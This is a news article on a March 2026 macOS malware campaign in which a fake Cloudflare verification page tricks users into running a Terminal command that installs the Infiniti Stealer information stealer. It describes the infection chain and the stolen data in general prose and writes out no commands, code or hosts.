Cybersecurity researchers have uncovered a new malware campaign targeting macOS users through a deceptive Cloudflare-themed verification page, delivering a powerful information-stealing tool known as Infiniti Stealer. The attack, disclosed in March 2026, highlights the growing sophistication of social engineering techniques used to compromise Apple devices.
The campaign leverages a tactic known as “ClickFix,” where users are tricked into executing malicious commands themselves rather than being infected through traditional exploits. Victims are presented with a fake CAPTCHA page designed to mimic Cloudflare’s human verification system and are instructed to paste and run a command in the macOS Terminal, unknowingly initiating the attack.
Once the command is executed, a multi-stage infection chain is triggered. A Bash script is first downloaded from a remote server, which then deploys a second-stage binary compiled using Nuitka, a tool that converts Python code into native applications. This approach makes the malware harder to detect and analyze using conventional security tools.
The final payload, Infiniti Stealer, is a Python-based information-stealing malware designed to extract sensitive data from infected systems. It targets browser credentials, macOS Keychain data, cryptocurrency wallets, developer environment files, and even captures screenshots during execution. The stolen data is then transmitted to a command-and-control server, and attackers receive notifications via Telegram once the data exfiltration is complete.
Researchers note that the attack relies entirely on social engineering rather than exploiting software vulnerabilities, making it particularly dangerous. By convincing users to execute commands manually, the malware can bypass many traditional security defenses that are designed to block automated threats.
The emergence of this campaign reflects a broader trend where techniques previously used against Windows systems are now being adapted for macOS environments. As attackers continue to refine their methods, experts warn that Mac users are increasingly becoming targets of sophisticated malware campaigns, emphasizing the need for heightened awareness and caution when interacting with unfamiliar prompts or verification pages.
